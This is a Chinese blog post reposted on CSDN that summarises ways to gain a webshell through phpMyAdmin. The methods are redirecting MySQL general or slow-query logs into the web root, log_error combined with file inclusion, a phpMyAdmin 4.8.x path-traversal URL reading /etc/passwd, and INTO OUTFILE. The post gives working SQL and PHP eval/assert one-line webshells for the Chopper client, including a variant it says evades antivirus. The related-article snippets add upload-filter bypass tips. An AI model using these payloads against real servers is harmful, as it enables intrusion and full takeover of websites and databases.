php如何用菜刀连接getshell,phpmyadmin之getshell总结

最新推荐文章于 2024-04-30 13:26:17 发布
最新推荐文章于 2024-04-30 13:26:17 发布
阅读量476 收藏 1
点赞数
文章标签: php如何用菜刀连接getshell

title: phpmyadmin中getshell的几种姿势

1,利用全局变量general_log去getshell

show variables like ‘%general%’;

26b8608955dda1fa8ee673bb3d31dba3.png

然后将general_log打开,执行命令set global general_log=on;

因为phpstudy默认的根目录是/phpstudy/www/,所以接下来只需要修改日志文件的位置到网站的根目录下。

set global general_log_file=‘C:/phpstudy/www/v01cano.php’;

972024dfdeb681f043709d7d5009bfb5.png

验证文件是否存在

761410a4989ebe99175f2c0d0d54b66b.png

访问该文件后发现,日志文件正常解析了,说明修改路径成功。会以文本形式显示的原因是由于没有<?php ?>php标记。

写入一句话木马:

select '<?php assert($_POST["v01cano"]); ?>'

这个就会记录到刚才的日志文件中。然后我们用菜刀连上。

fdc5bce7a1f46a83c1e6101dd9ed06a3.png

2,利用slow_query_log慢查询日志getshell

首先使用命令show variables like '%slow_query%'查询慢查询日志的状态,默认是关闭的

f9d998314d3601cec4219c5bcec5e627.png

执行命令SET GLOBAL slow_query_log=ON开启慢查询语句。

7e28643044848094dc84ae65d1aa9e70.png

执行命令set global slow_query_log_file=‘C:/phpstudy/www/v01cano.php’;修改慢查询日志路径。

修改成功:

bfa0640b33a7df2ab9f084e32a1fd17d.png

尝试直接写入shell,发现其并没有被记录进slow_query_log_file中即v01cano.php中,于是查询相关慢查询日志的说明得知,只有当执行的sql语句超过慢查询的阈值时,才会被记录其中。于是尝试使该sql语句执行的时间变长:

select '<?php @eval($_POST[v01cano]);?>' union select sleep(10)

即可成功将一句话木马写入v01cano.php文件中:

700cd9036b73082050a88c48ebb8c950.png

使用菜刀连接,成功getshell:

d3462c220d022388ae1a0294fc335af7.png

此处也可以修改慢查询的阈值getshell:

show variables like 'long_query_time'; #默认为10秒

#执行命令修改long_query_time的默认值为0.000001秒。

set global long_query_time = 0.000001;

#写入shell

select '<?php @eval($_POST[v01cano]);?>' union select sleep(2);

#即可成功getshell。

3,利用log_error错误日志getshell。

show variables like 'log_error';

#该日志会将phpmyadmin登入的用户名记录在其中,可以将一句话木马,通过用户名的登入框写入到该日#志中,当该web站点存在本地文件包含漏洞时,可以配合该漏洞getshell。

4,利用phpmyadmin4.8.x本地文件包含漏洞getshell

由于vulnspy靶机无法连接数据库,我就直接使用docker创建靶机环境了。

首先直接创建靶机,然后登录phpmyadmin,

本地文件包含漏洞测试:

http://192.168.174.130:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

0a6b65b3c98f3285f3929395890be2bc.png

getshell测试:直接写入select ‘<?php phpinfo();?>’

9ff690d09f4e7acf43240d5f51dadd2e.png

执行之后如图:

ddead661a721b455dc96ad7260cd3bd9.png

然后推荐一篇文章:

https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247485036&idx=1&sn=8e9647906c5d94f72564dec5bc51a2ab&chksm=e89e2eb4dfe9a7a28bff2efebb5b2723782dab660acff074c3f18c9e7dca924abdf3da618fb4&mpshare=1&scene=1&srcid=0621gAv1FMtrgoahD01psMZr&pass_ticket=LqhRfckPxAVG2dF%2FjxV%2F9%2FcEb5pShRgewJe%2FttJn2gIlIyGF%2FbsgGmzcbsV%2BLmMK#rd

5,利用into outfile写入;

#mysql新特性secure_file_priv会对读写文件产生影响,该参数用来限制导入导出

#查看该参数:

show global variables like '%secure%';

#当secure_file_priv为NULL时,表示限制mysql不允许导入导出。所以爆出错误

#要想使得该语句导出成功,则需要在mysql文件夹下修改my.ini 文件

#在[mysqld]内加入secure_file_priv ="" 即可

#写入shell

select "<?php @eval($_POST['v01cano']);?>" into outfile 'C:/phpStudy/WWW/v01cano.php';

6,补充,有时候在使用大马写入shell的时候遇到分号就会结束,这个时候可以考虑写入如下shell,而且免杀,嘿嘿。

select '<?php eval($_POST[v01cano])?>'

标签:总结,phpmyadmin,getshell,log,..,写入,日志,select

来源: https://blog.csdn.net/v01cano/article/details/90703847

吴俏茜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一句话木马拿Shell菜刀原理
悦分享
07-12 1465
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 1778
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
php如何用菜刀连接getshell,2019-11-7:练习上传getshell,通过菜刀连接
weixin_39805644的博客
03-16 479
一、使用phtstudy搭建环境1,将emlog源码解压到phpstudy的www目录,复制emlog源码中的src所有文件到需要搭建emlog的目录中,修改emlog配置文件,输入好本机mysql账户信息,之后访问emlog,根据情况设置填写信息二、寻找上传文件路径,上传getshell查询资料发现后台admin界面有个信息泄漏漏洞,get action=phpinfo可以得到phpinfo,成...
php如何用菜刀连接getshell,菜刀(代码执行)函数和命令执行函数详解及Getshell方法...
weixin_29730445的博客
03-16 892
@$temp = $_FILES['upload_file']['tmp_name'];@$file = basename($_FILES['upload_file']['name']);if (empty ($file)){echo "\n";echo "Local file: \n";echo "\n";echo "\n\n\n";}else {if(move_uploaded_file($t...
PhpAdmin-getshell
A345545108的博客
04-30 644
mysql打开general_log开关之后,所有对数据库的操作都将记录在general_log_file指定的文件目录中,以原始的状态来显示,如果将general_log开关打开,general_log_file指定一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,可以通过访问general_log_file指定的文件来获取webshell。路径:C:\phpstudy_pro\Extensions\MySQL5.7.26\。value可也已设置为其他路径。
自学渗透第四天--中国菜刀
weixin_43710367的博客
05-12 1255
自学渗透第四天–中国菜刀 一、如何使用 中国菜刀的使用可利用网站的文件上传漏洞,通过一句话木马“<?php @eval($_POST['caidao']);?>”获取网站shell。本笔记使用的靶机是owasp。 (1)首先将一句话木马上传至网站后台。 (2)运行该文件,确认文件上传成功。 (3)复制该链接到中国菜刀,并输入相应的密码。 (4)成功获取网站shell。 二、常用功能 1、上传本地文件到网站后台。 2、下载在线文件至网站后台。 将欲下载的文件链接添加至下载框即可 由于某
webshell及工具
heyingcheng的博客
05-10 2391
1,eval()函数把字符串按照php代码来计算;2,该字符串必须是合法的php代码,且必须以分号结尾;php中的echo的功能是把参数直接输出到页面上:php?给参数caidao赋值,然后输出到页面上:给caidao的值111输出到页面是111eval函数把字符串按照php代码进行解析,并且该字符串必须是合法的php代码。eval函数前面加上@符号可以不显示报错。php?eval函数的作用也是解析参数,我们在firefox随意传递一个参数试试:可以看到没有加@时我们会看到报错信息。
记一次tp5.0.24 getshell1
08-03
在这篇文章中,我们总结了TP5.0.24版本的getshell漏洞。我们发现了一个有趣的漏洞,即使用EXP来读取数据库文件,并获取数据库的账号密码。然而,我们也发现了服务器对日志文件进行了限制,我们无法读取日志文件。
phpmyadminphp爆路径字典
11-04
phpmyadmin后台,后台管理路径爆破,以及,php常用路径爆破字典
PHP 5.2 标准课程中级用phpmyadmin管理mysql
11-01
PHP 5.2 标准课程中级用phpmyadmin管理mysql数据库-3_2
phpmyadmin getshell
YouthBelief的博客
11-11 4962
phpmyadmin getshell前言一、into outfile写马条件利用方法操作二、开启日志写马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表写入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile写马 条件 1.对web目录需要有写权限能
phpmyadmin getshell的三种方式
luminous_you的博客
11-27 1217
phpmyadmin getshell的三种方式 方式一:包含日志文件getshell 方式二:into dumpfile 或者 into outfile 新表getshell https://www.cnblogs.com/muxueblog/p/13043768.html 方式三:数据库慢查询日志【主要针对日志量庞大,通过日志文件GETSHELL出现问题的情况】[如果登录了phpMyadmin没有办法直接写入文件,可以使用慢查询日志来进行文件写入。简单的说就是在mysql中,查询超过10秒的语句会被写
phpstudy后门getshell
10-14 3547
昨天在测试时候监听着我自己服务器的80端口,突然有个请求过来了。。一看ip,和我在同一个公网网段。可能是有人在扫我吧。 在浏览器里直接访问他的ip,发现80端口上搭了一个php服务。直接访问是一个phpstudy的探针。 看到phpstudy,忽然想起前些天的phpstudy后门。在网上查了一下, 我看的是这篇文章: https://www.cnblogs.com/-qing-/...
shell 写入文件_phpMyAdmin利用日志文件GetSHELL
weixin_35583709的博客
01-24 464
phpMyAdmin简介phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种,是一款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的。GetSHELL前提1、phpMyAdmin利用日志文件GetSHELL前提账号必须有可读可写权限2、MySQL版本大于5.0,MySQL 5.0版本...
phpmyadmin后台文件包含漏洞分析
nareku的博客
04-10 5913
前言 在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
phpmyadmin getshell总结
good good study
10-25 3137
phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
phpmyadmin常见getshell的方法
Blue的博客
06-10 2476
1、利用条件2、如果满足以上条件可以直接写shell在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用。在高版本的mysql中默认为NULL,就是不让导入和导出解决办法:在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_
【渗透测试】--- 利用phpmyadmin来getshell
qq_43168364的博客
12-24 644
利用phpmyadmin来getshell有两种方式 1、利用into outfile直接将一句话写入文件中 2、利用Mysql的日志文件getshell 不论是那种方式都要满足以下三个条件: 未限制文件路径 secure_file_priv= 当前用户有写文件权限 知道网站根目录 — C:\phpStudy\PHPTutorial\WWW 第一种方法 select "<?php phpinfo();?>" into outfile "/var/www/html/tes
phpmyadmin后台getshell方法学习总结
0nc3的博客
11-06 3121
0x00 前言 最近看的一篇文章中提到过phpmyadmin一些后台getshell方式,就想着写篇博客学习总结一下~~ 0x01 getshell方法 一、select into outfile直接写入 1.利用条件 对web目录需要有写权限能够使用单引号 知道绝对路径 没有配置secure_file_priv 2.步骤 先使用show global variables like '%secu...
shell脚本安装phpmyadmin
最新发布
06-02
安装phpMyAdmin的方法因操作系统而异,以下是在Linux上安装phpMyAdmin的一般步骤: 1.打开终端并以root身份登录 2.使用包管理器安装PHP(如果尚未安装): - Debian/Ubuntu:apt-get install php - CentOS/Fedora...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值